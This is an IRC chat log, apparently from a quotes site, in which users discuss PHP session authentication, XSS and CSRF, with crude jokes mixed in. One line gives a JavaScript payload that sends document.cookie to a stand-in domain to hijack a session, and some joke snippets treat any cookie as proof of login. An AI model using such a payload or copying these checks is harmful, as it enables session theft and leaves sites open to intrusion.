Quotes DB: useful, funny, interesting
<0> omg, can I have your e-mail address?
<0> do you have a naked pix?
<1> can you be quiet ?
<0> I'm quiet
<1> good
<0> promise
<1> Now is there anyone who can help me out with a lil' php script ?
<0> lol
<0> :D
<0> got the point?
<0> so, what was your name again?
<1> you should ask your mom that
<1> retard..
<2> Hah, I was reading a user auth tutorial, and look at these two lines, how ****ing pointless....
<2> $LOGGED_IN=false;
<2> unset($LOGGED_IN);
<2> WTF?
<0> lol
<0> is that for real?
<0> he wanted to make sure :P
<0> paranoid programmer
<0> :))
<2> Ya, that's too funny.
<2> http://www.phpbuilder.com/columns/tim20000505.php3?print_mode=1
<2> Look at the first two lines.
<2> Man, I skimmed like 10 tutorials on the topic and not a single one had a coherent way of doing it.
<0> hehe
<0> and he put his picture next to them :))
<2> I just do all my authentication in my global config include and override whether it's needed or not with some define()'s
<2> define('AUTH_REQUIRED', true);
<0> hmm never thought about it
<0> good point
<2> I used to put it in a $config array, but I'm moving past that now.
<2> I just don't like the idea of some programmer down the line ****ing up the config array then b0rking the system.
<3> dravine
<2> One typo and BOOM.
<3> doh
<2> What's up DEWEZ
<2> How do you deal with your user auth?
<3> needed to ask dravine about his imageshow idea
<3> i have apache2 now
<2> What's imageshow?
<3> and i need the processes to run under apache
<3> my user auth? how do you mean?
<0> I auth them on a page
<2> Do you have a global include, or do you do auth on a per page basis?
<3> they login, and i have a session class
<3> and each page checks the session
<0> same here
<3> well, only on the member ones
<2> Do you check in the page, or in a global include?
<0> _PhAnTaSm way is better tho
<3> i put it in the header
<2> Gotcha.
<3> better that way
<2> I was considering defining whether a page was authed or not in the db.
<2> That way it could be manipulated by the admin.
<3> hmm why?
<2> That's a good question.
<0> I'm the admin :P
<3> i only have like 2,000 users
<2> It's probably not the best idea, because then they could turn auth off for something that requires it and BOOM.
<3> but i have around 1400 people on the site at a given time
<0> best auth method: if (isset($_COOKIE['LoggedIn'])) $loggedin = TRUE; :D
<3> na
<2> haha
<0> do you know a better way? :P
<2> Even better... if(isset($_COOKIE)) { $is_admin = true; }
<0> heh
<2> ;)
<2> Actually I used to store UID and MD5-Pass in a cookie...
<2> Now it's just a session id, and session key.
<2> My session system is nearly impossible to hijack.
<2> Unless someone has direct access to someone else's cookies.
<0> well... the user has to send the session back with every call
<0> so it can be sniffed
<2> And even then, the second there are two attempts to request a page with the same session ID and different keys the session gets destroyed and email alerts are sent.
<2> Well it can be sniffed if it's not an SSL cookie.
<2> My session system uses a random rotating key.
<2> At each page request the cookie is sent, session id and key validated, key rotated.
<2> The moment a session id is found w/o a valid key, the session is destroyed and alerts get sent out everywhere.
<2> I've only had one alert in 3 years that i've been running this system.
<2> It was from a stupid proxyserver.
<2> It wasn't relaying cookies properly.
<0> that's the point :P
<0> nobody tries to hack it
<2> It's impossible *to* hack.
<2> It's based on the same premise as time based passwords.
<0> of course it's possible
<0> they're both cookies, right?
<2> Unless you guess the exact session id and the exact key at the same time, you won't be able to hijack a session.
<0> ok, let's put it this way
<2> Which with a 32bit session id and key is like 10000000000000000000000000000000000000 to 1.
<0> you're resetting them on every request
<2> Right.
<0> the user HAS TO HAVE the current key, right?
<2> Yes.
<0> the current pair
<2> Right.
<0> ok, do they have a place where they could interact with each other?
<2> What do you mean interact?
<0> talk, post something that others can read
<2> No, no one but the client or the server see either the key or the session id.
<0> supposing they do have a forum
<0> no, I'm talking about something else
<0> let's say I can inject some small js in your forum
<2> Are you talking about brute forcing a login?
<0> no
<4> http://www.bearcavecc.com/windows.jpg <---SWEET
<2> Or XSS?
<4> windows is a whole lot purdier
<0> what if I do var x = new Image; x.src = "mydomain" + escape(document.cookie);
<0> when I get the cookie I access a page using it
<0> now I own the session
<2> sk8ing, I follow ya, ya I mean if the developers open it up to an XSS vulnerability then sure someone could steal the session ID.
<2> Right, but even in that case, the moment the original user hits refresh, the session and key won't revalidate, and the session will be destroyed thus killing both the authed user and the stolen session.
<2> But ya XSS is a real problem with any website.
<0> yeah, that's a good feature
<0> I know, that would be the problem with any session :)
<5> PapaBear: what's the sweet part ?
<2> I hear ya sk8ing.
<4> novell, its purdy :D
<2> Ya it's a serious issue... even something as harmless as [img]http://domain.com/image.jpg[/img] can be a *real* problem.
<0> I know :)
<2> In that case it can be exploited by forcing the already authenticated clients to do as you bid.
<2> That's a second reason why no important actions can take place with GETs on our site.
<2> Anything important must run through a POST.
<2> But you could certainly take advantage of anyone that's also authenticated at any other website also.
<2> It's impossible to protect yourself against due to the nature of browsers.
<2> What we do on our form is force image hosting.
<2> Users want an image, they must upload it.
<2> We then validate the hell out of it.
<2> s/form/forum
<0> hehe
<2> I think vBulletin does something similar.
<2> Naturally phpBB is still highly vulnerable.
<5> PapaBear: when, except for making screenshots, will you really use transparency or will it be useful ?
<2> Trust me, I did lots of 'fun' things before I became a 'professional'. ;)
<5> _PhAnTaSm: gone from cracker to security researcher ? =P
<0> haha
<2> Not security researcher, just corporate suit.
<2> Heh, all the way back in the war dialing days.
<2> We were so leet with our 1200baud.
<2> A whopping 1.17k/sec
<0> hi speed connection :P
<0> high
<2> Hells ya, I could download a porn jpeg in like under 7 hours... at even 8bit!, it was hot.
<2> All my friends and I would sit around and play, where are the nipple pixels.
<6> how i can set access to file in fer manager?
<0> lol